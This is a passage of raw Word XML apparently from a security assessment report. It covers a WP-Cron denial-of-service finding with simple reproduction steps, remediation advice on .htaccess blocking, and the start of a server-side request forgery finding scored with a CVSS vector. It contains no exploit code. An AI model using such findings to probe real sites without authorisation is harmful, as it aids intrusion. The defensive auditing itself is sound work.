          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">t would </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16AFA6CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impact</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16AFA6CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the availability of th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16AFA6CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e system, preventing other users from being able to perform regular customer and employee workflow.</w:t>
      </w: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 xml:space="preserve"> However, we know the vulnerability is present because:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1978CA22" w:rsidP="0D325B6E" w:rsidRDefault="1978CA22" w14:paraId="0A279979" w14:textId="72B1C7D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St</w:t>
      </w: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 xml:space="preserve">ep </w:t>
      </w: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 xml:space="preserve">1. </w:t>
      </w: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Visit /wp-cron.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1978CA22" w:rsidP="0D325B6E" w:rsidRDefault="1978CA22" w14:paraId="49A60D41" w14:textId="3177C22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78CA22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2. Observe that the server does </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="566AA91F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not issue a 404 status, or a similar response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="06408E65" w14:textId="1D3E803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6242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="05C9CE76" w14:textId="1915CE7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6242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="0B7A9E29" w14:textId="6442801D">
      <w:p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6242CD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436DD2D" w:rsidP="0D325B6E" w:rsidRDefault="0436DD2D" w14:paraId="4EB0F5E3" w14:textId="0598D171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>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436DD2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block any external IP address from accessing WP-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0436DD2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cron.php</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0436DD2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </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explicitly</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 xml:space="preserve"> denying all incoming requests in the .</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htaccess</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 xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="61B3071D" w:rsidP="0D325B6E" w:rsidRDefault="61B3071D" w14:paraId="6D1883CF" w14:textId="3A94A84B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>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 xml:space="preserve">If the WP-Cron service is not in use or </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61B3071D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it is highly recommended to disable the feature to reduce attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="3DC845FD" w14:textId="3A8FB29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242CD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A83FB4A" w:rsidP="0D325B6E" w:rsidRDefault="2A83FB4A" w14:paraId="19F1D053" w14:textId="3FDF9016">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bb08847983364727">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2A83FB4A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>In-Motion Hosting: WP-Cron Security Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A83FB4A">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6208E9E3" w14:textId="6FF30D21">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5F1AEDF9" w14:textId="166275FB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0B5592B6" w14:textId="28318743">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0410BD0D" w:rsidP="0D325B6E" w:rsidRDefault="0410BD0D" w14:paraId="4C5EC747" w14:textId="31309BEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc285614754" w:id="60033502"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0410BD0D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0410BD0D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc77132525" w:id="1310564050"/>
      <w:bookmarkStart w:name="_Toc405304204" w:id="1754972916"/>
      <w:bookmarkStart w:name="_Toc1309357463" w:id="1035793813"/>
      <w:bookmarkStart w:name="_Toc2084842912" w:id="1776448869"/>
      <w:bookmarkStart w:name="_Toc154625577" w:id="908126937"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="127714A6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D92636C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server-Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D92636C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request Forgery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1310564050"/>
      <w:bookmarkEnd w:id="1754972916"/>
      <w:bookmarkEnd w:id="1035793813"/>
      <w:bookmarkEnd w:id="1776448869"/>
      <w:bookmarkEnd w:id="908126937"/>
      <w:bookmarkEnd w:id="60033502"/>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20"/>
        <w:gridCol w:w="2460"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="66F86ABF">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9FE65DD" w14:textId="3E12A34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67C38A6" w14:textId="600BF86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D72ADB" w14:textId="4AFCB18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0105EC1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A333724" w14:textId="2E78954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E8E663B" w14:textId="10550C4E">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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246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F1A59E6" w:rsidP="0D325B6E" w:rsidRDefault="6F1A59E6" w14:paraId="38BEA84C" w14:textId="3B7CCF81">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6F1A59E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>6.3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8A6CF0E" w14:textId="5EA9E19D">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07825B9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710F9F" w14:textId="5641C84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129792AE" w:rsidP="0D325B6E" w:rsidRDefault="129792AE" w14:paraId="0F363C2F" w14:textId="4F260AF5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFC000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="129792AE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2460" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ED19A3A"/>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6E772FC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="181B2490">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59521E" w14:textId="448507F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00F0C82" w:rsidP="0D325B6E" w:rsidRDefault="100F0C82" w14:paraId="40F40F94" w14:textId="2F05B319">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N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:N/SA:L" r:id="Rb72f5c2a441c4d2c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N</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A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</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H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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P</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>R</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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U</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>S</w:t>
              </w:r>
